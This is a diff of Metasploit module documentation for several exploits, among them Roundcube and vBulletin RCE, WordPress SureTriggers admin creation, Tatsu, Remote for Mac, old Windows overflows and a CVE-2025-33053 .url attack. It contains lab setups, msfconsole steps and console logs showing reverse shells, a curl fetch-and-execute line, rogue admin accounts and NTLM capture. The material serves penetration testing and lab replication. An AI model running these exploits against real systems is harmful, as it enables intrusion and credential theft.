+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT      9999             yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       The URI of the Roundcube Application
+   TIMEOUT    3                no        Time to wait for session (in seconds)
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   USERNAME                    yes       Email User to login with
+   VHOST                       no        HTTP server virtual host
+
+
+   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+
+
+Payload options (linux/x64/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Linux
+
+msf6 exploit(multi/http/roundcube_unauth_rce_cve_2025_49113) > exploit
+
+[*] Started reverse TCP handler on 192.168.159.129:8082 
+[*] Using URL: http://192.168.159.129:9696/
+[*] Fetching CSRF token...
+[*] Attempting login...
+[+] Login successful.
+[*] Preparing payload...
+[+] Payload successfully generated and serialized.
+[*] Uploading malicious payload...
+[*] Client 192.168.181.148 (curl/7.74.0) requested /
+[*] Sending payload to 192.168.181.148 (curl/7.74.0)
+[*] Sending stage (3045380 bytes) to 192.168.181.148
+[*] Meterpreter session 1 opened (192.168.159.129:8082 -> 192.168.181.148:56528) at 2025-06-06 21:05:59 -0400
+[+] Exploit attempt complete. Check for session.
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: www-data
+
+meterpreter > sysinfo
+Computer     : dante.local
+OS           : Debian 11.5 (Linux 6.11.2-amd64)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+
+```
@@ -0,0 +1,173 @@
+## Vulnerable Application
+
+This Metasploit module exploits a design flaw in vBulletin’s AJAX API handler and template
+rendering system, affecting **vBulletin 5.0.0 through 6.0.3** on **PHP 8.1+**.
+An unauthenticated attacker can invoke the protected `vB_Api_Ad::replaceAdTemplate()` method to inject a malicious template that calls
+`"system"("base64_decode"($_POST[<param>]))`, then trigger execution via the `ajax/render/ad_<location>` endpoint,
+yielding arbitrary code execution as the webserver user.
+
+> **Note:** vBulletin is commercial software and is **not** included here. You must obtain a licensed copy and extract it under `./upload/`.
+
+---
+
+## To replicate vulnerable environments
+
+1. **vBulletin 6.0.1 (tested)**
+
+   * Purchase and download vBulletin 6.0.1 from the official portal.
+   * Extract all files into `./upload/`.
+
+2. **Other versions (5.0.0–6.0.3)**
+
+   * Repeat the above with any of the supported versions.
+   * Ensure you run on PHP 8.1+; earlier PHP versions do not expose this flaw.
+
+---
+
+## Docker Compose Configuration
+
+```yaml
+services:
+  db:
+    image: mysql:5.7
+    container_name: vbulletin_db
+    restart: unless-stopped
+    environment:
+      MYSQL_ROOT_PASSWORD: root_password_here
+      MYSQL_DATABASE: vbulletin
+      MYSQL_USER: vbulletin
+      MYSQL_PASSWORD: vb_password_here
+    volumes:
+      - db_data:/var/lib/mysql
+
+  web:
+    build: .
+    container_name: vbulletin_web
+    depends_on: [db]
+    ports: ["8888:80"]
+    environment:
+      VB_DB_HOST: db
+      VB_DB_NAME: vbulletin
+      VB_DB_USER: vbulletin
+      VB_DB_PASS: vb_password_here
+
+volumes:
+  db_data:
+```
+
+Create the following **Dockerfile** and **docker-entrypoint.sh** in the same directory:
+
+**Dockerfile**
+
+```dockerfile
+FROM php:8.1-apache
+
+COPY upload/ /var/www/html/
+
+RUN apt-get update && \
+    apt-get install -y --no-install-recommends \
+       libzip-dev zlib1g-dev libonig-dev \
+       libpng-dev libjpeg-dev libfreetype6-dev && \
+    docker-php-ext-install \
+       zip mysqli pdo_mysql gd mbstring && \
+    a2enmod rewrite && \
+    rm -rf /var/lib/apt/lists/*
+
+RUN echo "phar.readonly=Off" > /usr/local/etc/php/conf.d/vbulletin.ini
+
+COPY --chmod 755 docker-entrypoint.sh /usr/local/bin/
+ENTRYPOINT ["docker-entrypoint.sh"]
+CMD ["apache2-foreground"]
+```
+
+**docker-entrypoint.sh**
+
+```bash
+#!/bin/bash
+chown -R www-data:www-data /var/www/html
+exec "$@"
+```
+
+---
+
+## Verification Steps
+
+1. **Start the environment**
+```bash
+docker-compose up -d
+```
+
+2. **Install vBulletin**
+Open [http://localhost:8888](http://localhost:8888) and complete the installation:
+
+* **Database Host:** db
+* **DB Name:** vbulletin
+* **DB User:** vbulletin
+* **DB Password:** vb_password_here
+
+3. **Run `msfconsole`**
+
+```bash
+use exploit/multi/http/vbulletin_replace_ad_template_rce
+set RHOSTS 127.0.0.1
+set RPORT 8888
+set TARGETURI /
+check
+```
+
+---
+
+## Options
+
+No option
+
+---
+
+## Scenarios
+
+### Unauthenticated Pre-Auth RCE
+
+1. Ensure vBulletin 5.0.0–6.0.3 is installed and running on PHP 8.1+.
+2. In `msfconsole`, configure and run:
+
+```bash
+set RHOSTS localhost
+set RPORT 8888
+set TARGETURI /
+```
+
+---
+
+## Expected Results
+
+### With `cmd/linux/http/x64/meterpreter/reverse_tcp`
+
+```plaintext
+msf6 exploit(multi/http/vbulletin_replace_ad_template_rce) > run http://lab:8888
+[*] Command to run on remote host: curl -so ./BGZuzbsi http://192.168.1.36:8080/LoPlnjEpeOexZNVppn6cAA;chmod +x ./BGZuzbsi;./BGZuzbsi&
+[*] Fetch handler listening on 192.168.1.36:8080
+[*] HTTP server started
+[*] Adding resource /LoPlnjEpeOexZNVppn6cAA
+[*] Started reverse TCP handler on 192.168.1.36:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Starting vulnerability check on 127.0.0.1:8888/
+[*] Generating random marker and condition for mode check
+[*] Sending POST to ajax/api/ad/replaceAdTemplate (location=QuFcp)
+[*] Injection response: HTTP 200
+[+] Marker found in injection response body
+[+] The target is vulnerable.
+[*] Generating random marker and condition for mode exploit
+[*] Sending POST to ajax/api/ad/replaceAdTemplate (location=XSGFS)
+[*] Client 172.28.0.3 requested /LoPlnjEpeOexZNVppn6cAA
+[*] Sending payload to 172.28.0.3 (curl/7.88.1)
+[*] Transmitting intermediate stager...(126 bytes)
+[*] Sending stage (3045380 bytes) to 172.28.0.3
+[*] Meterpreter session 8 opened (192.168.1.36:4444 -> 172.28.0.3:53014) at 2025-05-29 16:27:00 +0200
+
+meterpreter > sysinfo
+Computer     : 172.28.0.3
+OS           : Debian 12.11 (Linux 6.14.8-2-cachyos)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+```
@@ -1,17 +1,28 @@
 ## Vulnerable Application

-This Metasploit module exploits an administrative user creation vulnerability in the
-WordPress SureTriggers plugin, versions <= 1.0.78 (CVE-2025-3102).
-The plugin exposes an unauthenticated REST endpoint (`automation/action`) that allows
-bypassing permission checks to create a new administrator account.
+This Metasploit module exploits administrative user creation vulnerabilities in the
+WordPress SureTriggers/OttoKit plugin:

-To replicate a vulnerable environment for testing:
+* **CVE-2025-3102** (≤ 1.0.78): unauthenticated admin creation via the `automation/action`
+REST endpoint with an empty `St-Authorization: Bearer` header.
+* **CVE-2025-27007** (≤ 1.0.82): unauthenticated reset of the access key via the `connection/create-wp-connection` endpoint,
+followed by admin creation using `St-Authorization: Bearer <NEW_KEY>`.

-1. Install WordPress using the provided Docker Compose configuration.
-2. Download and install the SureTriggers plugin v1.0.78:
-   [https://downloads.wordpress.org/plugin/suretriggers.1.0.78.zip](https://downloads.wordpress.org/plugin/suretriggers.1.0.78.zip)
-3. Verify that the plugin is activated and accessible on the local network.
-4. No further configuration is required; vulnerability is present immediately upon activation.
+### To replicate vulnerable environments
+
+1. **SureTriggers v1.0.78 (CVE-2025-3102)**
+
+   * Download & install plugin v1.0.78:
+     `https://downloads.wordpress.org/plugin/suretriggers.1.0.78.zip`
+   * No additional setup is required; the bypass works immediately upon activation.
+
+2. **SureTriggers v1.0.82 (CVE-2025-27007)**
+
+   * Download & install plugin v1.0.82:
+     `https://downloads.wordpress.org/plugin/suretriggers.1.0.82.zip`
+   * No secret key is needed; the exploit will reset it to the specified value.
+
+Both scenarios can be deployed via Docker Compose.

 ## Docker Compose Configuration

@@ -62,131 +73,168 @@ post_max_size = 64M
 ```bash
 docker-compose up -d
 ```
-
-2. Complete WordPress setup at [http://localhost:5555](http://localhost:5555)
-3. Confirm that SureTriggers v1.0.78 is active under **Plugins**
-4. Launch `msfconsole`
-5. Load the module:
+2. Complete WordPress setup at [http://localhost:5555](http://localhost:5555).
+3. Confirm the targeted SureTriggers version is active under **Plugins**.
+4. In `msfconsole`:

 ```bash
 use exploit/multi/http/wp_suretriggers_auth_bypass
-```
-
-6. Set `RHOSTS` to the target IP
-7. Optionally set `ST_AUTH` if you have an existing key
-8. Configure `WP_USER`, `WP_PASS`, `WP_EMAIL`
-9. Execute the exploit with `run`
-
-## Options
-
-* **RHOSTS**: Target IP address or hostname where WordPress is running.
-* **TARGETURI**: Base path to the WordPress installation (default is `/`).
-* **WP_USER**, **WP_PASS**, **WP_EMAIL**: Credentials for the new administrator account that the exploit will create.
-  By default these are randomly generated but you can set them to values of your choice, for example:
-
-```bash
+set RHOSTS 127.0.0.1
+set TARGETURI /
 set WP_USER eviladmin
 set WP_PASS Str0ngP@ss!
 set WP_EMAIL eviladmin@example.com
 ```

-* **ST_AUTH**: *(Optional)* If you have the plugin’s secret key (used in the `st_authorization` header),
-  you can provide it here to authenticate the REST request.
-  If left empty the module will send an empty header value, which still works on versions <= 1.0.78.
+## Options
+
+* **WP_USER**, **WP_PASS**, **WP_EMAIL**: New administrator credentials (random by default).
+* **ST_AUTH**: *(Optional)* Value for `St-Authorization` header (used by CVE-2025-3102; default empty).
+* **ACCESS_KEY**: *(Optional)* Key to reset for CVE-2025-27007 (random by default).
+* **ACTION**: Exploit to perform:
+
+  * `CVE-2025-3102`
+  * `CVE-2025-27007`

 ## Scenarios

-### Successful Exploitation Against SureTriggers v1.0.78
+### CVE-2025-3102: Empty Bearer Admin Creation

-**Setup:**
+1. Ensure SureTriggers v1.0.78 is active.
+2. In `msfconsole`, set:

-* Local WordPress instance with SureTriggers v1.0.78
-* Metasploit Framework
-
-**Steps:**
-
-1. Start `msfconsole`
-
-2. Load the module:
 ```bash
-use exploit/multi/http/wp_suretriggers_auth_bypass
-```
-3. Configure:
-```bash
-set RHOSTS 127.0.0.1
-set TARGETURI /
-set WP_USER eviladmin
-set WP_PASS Str0ngP@ss!
-run
+set ACTION CVE-2025-3102
 ```
+3. Run the module: it will send an empty `St-Authorization: Bearer ` header to `/wp-json/sure-triggers/v1/automation/action`.
+4. New administrator is created; payload is uploaded and executed.

-**Expected Results**:
+### CVE-2025-27007: Reset Access Key & Admin Creation
+
+1. Ensure SureTriggers v1.0.82 is active.
+2. In `msfconsole`, set:
+
+```bash
+set ACTION CVE-2025-27007
+```
+3. Run the module: it will call `/wp-json/sure-triggers/v1/connection/create-wp-connection` to reset the key, then use
+   `St-Authorization: Bearer mynewkey123` against `/wp-json/sure-triggers/v1/automation/action`.
+4. New administrator is created; payload is uploaded and executed.
+
+
+### Expected Results (CVE-2025-3102)

 With `php/meterpreter/reverse_tcp`:

 ```plaintext
-msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > run http://127.0.0.1:5555
+msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > set action CVE-2025-3102
+action => CVE-2025-3102
+msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > run http://lab:5555
 [*] Started reverse TCP handler on 192.168.1.36:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
-[*] Detected WordPress version: 6.3.2
-[+] Detected suretriggers plugin version: 1.0.78
-[+] The target appears to be vulnerable.
-[*] Attempting to create administrator user via auth bypass...
-[!] Primary endpoint failed or did not return success, trying fallback via rest_route...
-[+] Administrator created: sol_bash:k9R0ZwjRX5VBOBJ
+[*] Detected WordPress version: 6.8.1
+[+] The target appears to be vulnerable. Detected suretriggers 1.0.78 vulnerable to CVE-2025-3102
+[+] Admin created: warner:Q0bTyYI43H8g
 [*] Uploading malicious plugin for code execution...
-[*] Executing payload at /wp-content/plugins/wp_p2ash/ajax_efdsa.php...
-[*] Sending stage (40004 bytes) to 172.27.0.2
-[+] Deleted ajax_efdsa.php
-[+] Deleted wp_p2ash.php
-[+] Deleted ../wp_p2ash
-[*] Meterpreter session 3 opened (192.168.1.36:4444 -> 172.27.0.2:33924) at 2025-05-07 17:22:49 +0200
+[*] Executing payload at /wp-content/plugins/wp_hkc1z/ajax_kq8xu.php...
+[*] Sending stage (40004 bytes) to 172.27.0.3
+[+] Deleted ajax_kq8xu.php
+[+] Deleted wp_hkc1z.php
+[+] Deleted ../wp_hkc1z
+[*] Meterpreter session 6 opened (192.168.1.36:4444 -> 172.27.0.3:43702) at 2025-05-21 19:35:49 +0200

 meterpreter > sysinfo
-Computer    : a6e792b1c252
-OS          : Linux a6e792b1c252 6.14.2-2-cachyos #1 SMP PREEMPT_DYNAMIC Thu, 10 Apr 2025 17:27:10 +0000 x86_64
+Computer    : 396e678f2510
+OS          : Linux 396e678f2510 6.14.6-2-cachyos #1 SMP PREEMPT_DYNAMIC Sat, 10 May 2025 20:09:10 +0000 x86_64
 Meterpreter : php/linux
 ```

 With `cmd/linux/http/x64/meterpreter/reverse_tcp`:

 ```plaintext
-msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > show targets
-
-Exploit targets:
-=================
-
-    Id  Name
-    --  ----
-=>  0   PHP In-Memory
-    1   Unix In-Memory
-    2   Windows In-Memory
-
-
+msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > set action CVE-2025-3102
+action => CVE-2025-3102
 msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > set target 1
 target => 1
 msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
 payload => cmd/linux/http/x64/meterpreter/reverse_tcp
-msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > run http://127.0.0.1:5555
+msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > run http://lab:5555
 [*] Started reverse TCP handler on 192.168.1.36:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
-[*] Detected WordPress version: 6.3.2
-[+] Detected suretriggers plugin version: 1.0.78
-[+] The target appears to be vulnerable.
-[*] Attempting to create administrator user via auth bypass...
-[!] Primary endpoint failed or did not return success, trying fallback via rest_route...
-[+] Administrator created: sol_bash:k9R0ZwjRX5VBOBJ
+[*] Detected WordPress version: 6.8.1
+[+] The target appears to be vulnerable. Detected suretriggers 1.0.78 vulnerable to CVE-2025-3102
+[+] Admin created: warner:Q0bTyYI43H8g
 [*] Uploading malicious plugin for code execution...
-[*] Executing payload at /wp-content/plugins/wp_ppqii/ajax_cqc8l.php...
-[*] Sending stage (3045380 bytes) to 172.27.0.2
-[+] Deleted ajax_cqc8l.php
-[+] Deleted wp_ppqii.php
-[+] Deleted ../wp_ppqii
-[*] Meterpreter session 4 opened (192.168.1.36:4444 -> 172.27.0.2:54238) at 2025-05-07 17:24:10 +0200
+[*] Executing payload at /wp-content/plugins/wp_xtndd/ajax_bmjl3.php...
+[*] Sending stage (3045380 bytes) to 172.27.0.3
+[+] Deleted ajax_bmjl3.php
+[+] Deleted wp_xtndd.php
+[+] Deleted ../wp_xtndd
+[*] Meterpreter session 7 opened (192.168.1.36:4444 -> 172.27.0.3:35176) at 2025-05-21 19:36:44 +0200

 meterpreter > sysinfo
-Computer     : 172.27.0.2
-OS           : Debian 11.8 (Linux 6.14.2-2-cachyos)
+Computer     : 172.27.0.3
+OS           : Debian 12.10 (Linux 6.14.6-2-cachyos)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+```
+
+### Expected Results (CVE-2025-27007)
+
+With `php/meterpreter/reverse_tcp`:
+
+```plaintext
+msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > set action CVE-2025-27007
+action => CVE-2025-27007
+msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > run http://lab:5555
+[*] Started reverse TCP handler on 192.168.1.36:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Detected WordPress version: 6.8.1
+[+] The target appears to be vulnerable. Detected suretriggers 1.0.82 vulnerable to CVE-2025-27007
+[*] Resetting access key
+[+] Access key reset successful
+[+] Admin created: warner:Q0bTyYI43H8g
+[*] Uploading malicious plugin for code execution...
+[*] Executing payload at /wp-content/plugins/wp_kbl7m/ajax_awg0f.php...
+[*] Sending stage (40004 bytes) to 172.27.0.3
+[+] Deleted ajax_awg0f.php
+[+] Deleted wp_kbl7m.php
+[+] Deleted ../wp_kbl7m
+[*] Meterpreter session 4 opened (192.168.1.36:4444 -> 172.27.0.3:52622) at 2025-05-21 19:31:04 +0200
+
+meterpreter > sysinfo
+Computer    : 396e678f2510
+OS          : Linux 396e678f2510 6.14.6-2-cachyos #1 SMP PREEMPT_DYNAMIC Sat, 10 May 2025 20:09:10 +0000 x86_64
+Meterpreter : php/linux
+```
+
+With `cmd/linux/http/x64/meterpreter/reverse_tcp`:
+
+```plaintext
+msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > set target 1
+target => 1
+msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
+payload => cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > run http://lab:5555
+[*] Started reverse TCP handler on 192.168.1.36:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Detected WordPress version: 6.8.1
+[+] The target appears to be vulnerable. Detected suretriggers 1.0.82 vulnerable to CVE-2025-27007
+[*] Resetting access key
+[+] Access key reset successful
+[+] Admin created: warner:Q0bTyYI43H8g
+[*] Uploading malicious plugin for code execution...
+[*] Executing payload at /wp-content/plugins/wp_uozfu/ajax_cqg9q.php...
+[*] Sending stage (3045380 bytes) to 172.27.0.3
+[+] Deleted ajax_cqg9q.php
+[+] Deleted wp_uozfu.php
+[+] Deleted ../wp_uozfu
+[*] Meterpreter session 5 opened (192.168.1.36:4444 -> 172.27.0.3:56038) at 2025-05-21 19:33:42 +0200
+
+meterpreter > sysinfo
+Computer     : 172.27.0.3
+OS           : Debian 12.10 (Linux 6.14.6-2-cachyos)
 Architecture : x64
 BuildTuple   : x86_64-linux-musl
 Meterpreter  : x64/linux
@@ -0,0 +1,76 @@
+## Vulnerable Application
+
+This module exploits unauthenticated remote code execution in Tatsu plugin for Wordpress. The vulnerable version is below 3.3.11.
+The module upload malicious zip file containing PHP payload, which gets parsed and unzipped into Wordpress upload directory.
+Then module will trigger the payload by sending request with payload directory as URI.
+The vulnerable plugin is available [here](https://tatsubuilder.com/wp-content/uploads/edd/2022/03/tatsu-3.3.11.zip)
+
+## Verification Steps
+
+
+1. Install the application
+1.1 Create `docker-compose.yml`
+```yaml
+services:
+
+  wordpress:
+    image: wordpress:6.3.2
+    restart: always
+    ports:
+      - 5555:80
+    environment:
+      WORDPRESS_DB_HOST: db
+      WORDPRESS_DB_USER: ms
+      WORDPRESS_DB_PASSWORD: supersecret
+      WORDPRESS_DB_NAME: proof_of_concept
+    volumes:
+      - wordpress:/var/www/html
+      - ./custom.ini:/usr/local/etc/php/conf.d/custom.ini
+
+  db:
+    image: mysql:5.7
+    restart: always
+    environment:
+      MYSQL_DATABASE: proof_of_concept
+      MYSQL_USER: ms
+      MYSQL_PASSWORD: supersecret
+      MYSQL_ROOT_PASSWORD: supersecret
+    volumes:
+      - db:/var/lib/mysql
+
+volumes:
+  wordpress:
+  db:
+
+```
+1.2 Download [plugin](https://tatsubuilder.com/wp-content/uploads/edd/2022/03/tatsu-3.3.11.zip)
+1.3 Install the plugin in Wordpress admin portal
+
+2. `msfconsole`
+3. `use multi/http/wp_tatsu_rce`
+4. `set RHOST [target IP]`
+5. `set RPORT [target PORT]`
+6. `set LHOST [attacker's IP]`
+7. `set LPORT [attacker's port]`
+
+## Options
+
+
+## Scenarios
+
+
+Vulnerable version is <= 3.3.11.
+
+```
+`msf6 exploit(multi/http/wp_tatsu_rce) > run
+[*] Started reverse TCP handler on 192.168.168.128:4444 
+[*] Sending stage (40004 bytes) to 172.18.0.2
+[*] Meterpreter session 2 opened (192.168.168.128:4444 -> 172.18.0.2:37718) at 2025-06-11 18:59:35 +0200
+[*] Starting interaction with 2...
+
+meterpreter > sysinfo
+Computer    : ff0d55ec29bf
+OS          : Linux ff0d55ec29bf 6.12.10-76061203-generic #202412060638~1748542656~22.04~663e4dc SMP PREEMPT_DYNAMIC Thu M x86_64
+Meterpreter : php/linux
+meterpreter > 
+```
@@ -0,0 +1,40 @@
+# Module Documentation: Remote for Mac 2025.6 - Unauthenticated RCE
+
+## Overview
+
+This module exploits an unauthenticated remote code execution (RCE) vulnerability in **Remote for Mac 2025.6**. When the **"Allow unknown devices"** setting is enabled (disabled by default), the `/api/executeScript` endpoint allows unauthenticated attackers to execute arbitrary AppleScript commands, including shell commands, on the target macOS system.
+
+**Exploit Author:** [Chokri Hammedi](https://packetstormsecurity.com/files/195347/)
+
+**Module Path:** `modules/exploits/osx/http/remote_for_mac_rce.rb`
+
+## Vulnerable Application
+
+- **Vendor:** Evgeny Cherpak
+- **Homepage:** [https://cherpake.com/](https://cherpake.com/)
+- **Download:** [https://cherpake.com/latest.php?os=mac](https://cherpake.com/latest.php?os=mac)
+- **Affected Version:** Remote for Mac 2025.6
+- **Tested on:** macOS Mojave 10.14.6
+
+## Vulnerability Details
+
+- **Endpoint:** `/api/executeScript`
+- **Vulnerability:** Missing authentication
+- **Trigger Condition:** The app must have **"Allow unknown devices"** enabled.
+- **Impact:** Full command execution as the logged-in user.
+
+The exploit sends a specially crafted GET request with AppleScript payload headers to the unauthenticated endpoint. The server executes the `do shell script` AppleScript, leading to remote command execution.
+
+## Usage Example
+
+From within `msfconsole`:
+
+```bash
+use exploit/osx/http/remote_for_mac_rce
+set RHOSTS 192.168.1.100
+set RPORT 443
+set SSL true
+set PAYLOAD cmd/unix/reverse_bash
+set LHOST 192.168.1.50
+run
+
@@ -0,0 +1,52 @@
+## Vulnerable Application
+
+This module exploits a stack buffer overflow in Microsoft Visual
+Studio 6.0. When passing a specially crafted string to the Mask
+parameter of the Mdmask32.ocx ActiveX Control, an attacker may
+be able to execute arbitrary code.
+
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use exploit/windows/browser/ms08_070_visual_studio_msmask`
+1. Do: `set SRVHOST [host]`
+1. Do: `set SRVPORT [port]`
+1. Do: `set URIPATH [uri]`
+1. Do: `set PAYLOAD [payload]`
+1. Do: `run`
+1. Open the server URL on a vulnerable system
+
+
+## Options
+
+### URIPATH
+
+The server URI path to use. (default: `/`)
+
+
+## Scenarios
+
+### Windows XP SP3 (x86) (English)
+
+```
+msf6 > use exploit/windows/browser/ms08_070_visual_studio_msmask
+[*] Using configured payload windows/shell/reverse_tcp
+msf6 exploit(windows/browser/ms08_070_visual_studio_msmask) > set srvhost 0.0.0.0
+srvhost => 0.0.0.0
+msf6 exploit(windows/browser/ms08_070_visual_studio_msmask) > set srvport 8080
+srvport => 8080
+msf6 exploit(windows/browser/ms08_070_visual_studio_msmask) > set lhost 192.168.200.130 
+lhost => 192.168.200.130
+msf6 exploit(windows/browser/ms08_070_visual_studio_msmask) > run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+
+[*] Started reverse TCP handler on 192.168.200.130:4444 
+[*] Using URL: http://192.168.200.130:8080/
+[*] Server started.
+msf6 exploit(windows/browser/ms08_070_visual_studio_msmask) > 
+[*] 192.168.200.173  ms08_070_visual_studio_msmask - Sending Microsoft Visual Studio Mdmask32.ocx ActiveX Stack Buffer Overflow
+[*] Sending stage (240 bytes) to 192.168.200.173
+[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.173:1052) at 2025-06-22 03:01:18 -0400
+```
@@ -0,0 +1,87 @@
+## Vulnerable Application
+
+This module exploits a stack buffer overflow in Microsoft Visual Basic
+6.0. A specially crafted Visual Basic Project (VBP) file containing
+a long reference line can be used to execute arbitrary code.
+
+This module has been tested successfully on:
+
+* Windows XP Home SP0 (x86) (English)
+* Windows XP Professional SP0 (x86) (English)
+* Windows XP Professional SP1 (x86-64) (English)
+* Windows XP Professional SP2 (x86-64) (English)
+* Windows XP Professional SP3 (x86) (English)
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use exploit/windows/fileformat/ms_visual_basic_vbp`
+1. Do: `set filename [filename.vbp]`
+1. Do: `set lhost [lhost]`
+1. Do: `set lport [lport]`
+1. Do: `set payload windows/shell/reverse_tcp`
+1. Do: `run`
+1. Do: `use exploit/multi/handler`
+1. Do: `set lhost [lhost]`
+1. Do: `set lport [lport]`
+1. Do: `set payload windows/shell/reverse_tcp`
+1. Do: `run -jz`
+1. Open `/home/user/.msf4/local/msf.vbp` on a vulnerable system
+
+## Options
+
+### FILENAME
+
+The project file name. (Default: `msf.vbp`).
+
+## Scenarios
+
+### Windows XP SP3 (x86) (English)
+
+```
+msf6 > use exploit/windows/fileformat/ms_visual_basic_vbp
+[*] Using configured payload windows/shell/reverse_tcp
+msf6 exploit(windows/fileformat/ms_visual_basic_vbp) > set lhost 192.168.200.130 
+lhost => 192.168.200.130
+msf6 exploit(windows/fileformat/ms_visual_basic_vbp) > show targets
+
+Exploit targets:
+=================
+
+    Id  Name
+    --  ----
+=>  0   Windows XP SP0-SP3 (x86) (English)
+    1   Windows XP SP1-SP2 (x86-64) (English)
+
+
+msf6 exploit(windows/fileformat/ms_visual_basic_vbp) > run
+[*] Creating 'msf.vbp' file for Windows XP SP0-SP3 (x86) (English) ...
+[+] msf.vbp stored at /home/user/.msf4/local/msf.vbp
+msf6 exploit(windows/fileformat/ms_visual_basic_vbp) > use exploit/multi/handler
+[*] Using configured payload generic/shell_reverse_tcp
+msf6 exploit(multi/handler) > set lhost 192.168.200.130
+lhost => 192.168.200.130
+msf6 exploit(multi/handler) > set payload windows/shell/reverse_tcp
+payload => windows/shell/reverse_tcp
+msf6 exploit(multi/handler) > run -jz
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+
+[*] Started reverse TCP handler on 192.168.200.130:4444 
+msf6 exploit(multi/handler) > mv /home/user/.msf4/local/msf.vbp /var/www/html/msf.vbp
+[*] exec: mv /home/user/.msf4/local/msf.vbp /var/www/html/msf.vbp
+
+msf6 exploit(multi/handler) > 
+[*] Sending stage (240 bytes) to 192.168.200.173
+[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.173:1037) at 2025-06-21 08:03:44 -0400
+
+msf6 exploit(multi/handler) > sessions -i 1
+[*] Starting interaction with 1...
+
+
+Shell Banner:
+Microsoft Windows XP [Version 5.1.2600]
+(C) Copyright 1985-2001 Microsoft Corp.
+
+C:\Documents and Settings\Administrator\Desktop>
+```
@@ -0,0 +1,104 @@
+## Vulnerable Application
+
+CVE-2025-33053 - Internet Shortcut (.url) UNC Path Exploit
+
+Windows improperly handles `.url` (Internet Shortcut) files referencing remote
+UNC paths. Specifically, `.url` files that specify a remote working directory
+(`WorkingDirectory=\\attacker\webdav`) and a trusted executable (e.g.,
+`iediagcmd.exe`) may cause the system to access the attacker's server when opened.
+
+This behavior can be exploited to:
+
+- Trigger NTLM authentication leaks (SMB relay)
+- Load remote payloads via WebDAV shares
+- Attempt DLL sideloading if conditions allow
+
+## Affected Versions
+
+- Windows 10 22H2
+- Windows 11 23H2
+- Fully patched prior to June 2025 Patch Tuesday
+
+## Verification Steps
+
+1. Run: `use windows/fileformat/unc_url_cve_2025_33053`
+2. Run: `set LHOST [IP address]`
+3. Run: `set SRVHOST [IP address]`
+4. Run: `run`
+5. Deliver the `.url` to the target (email, USB, zip)
+6. On victim's machine, open `.url`
+7. Payload execution
+
+### Overview
+
+This module generates a malicious `.url` Internet Shortcut file that abuses
+CVE-2025-33053 — a vulnerability in how Windows handles `.url` files referencing remote UNC
+paths.
+
+When opened on a vulnerable system, the `.url` causes the system to connect to a
+UNC path(e.g., a WebDAV or SMB share), triggering an attempt to execute a trusted binary
+from the attacker's location. This can result in RCE or credential leaks.
+
+
+## Options
+
+### OUTFILE
+This option allows user to define their own .url file. If this option is not set, the module will generate random .url file - `YWSXVjpW.url`.
+
+### FOLDER_NAME
+The `FOLDER_NAME` option defines SMB share folder, where the final payload file is stored. Generally can be anything, default is `webdav`.
+
+### FILE_NAME
+This option defines payload file stored in SMB share. This option should not change as it is bound to executable in `URL` parameter of `.url` file. The default value is `explorer.exe`.
+
+
+## Scenarios
+
+```
+msf6 exploit(windows/fileformat/unc_url_cve_2025_33053) > run verbose=true 
+[*] Exploit running as background job 2.
+[*] Exploit completed, but no session was created.
+
+msf6 exploit(windows/fileformat/unc_url_cve_2025_33053) > [*] Started reverse TCP handler on 192.168.3.7:4444 
+[*] URL file: /home/ms/.msf4/local/YWSXVjpW.url, deliver to target's machine and wait for shell
+[*] Run following: curl http://192.168.3.7:8080/YWSXVjpW.url -o YWSXVjpW.url
+[*] Server is running. Listening on 192.168.3.7:4445
+[*] The SMB service has been started.
+[*] Received SMB connection from 10.5.132.137
+[SMB] NTLMv2-SSP Client     : 10.5.132.137
+[SMB] NTLMv2-SSP Username   : WIN10_22H2_7FD2\msfuser
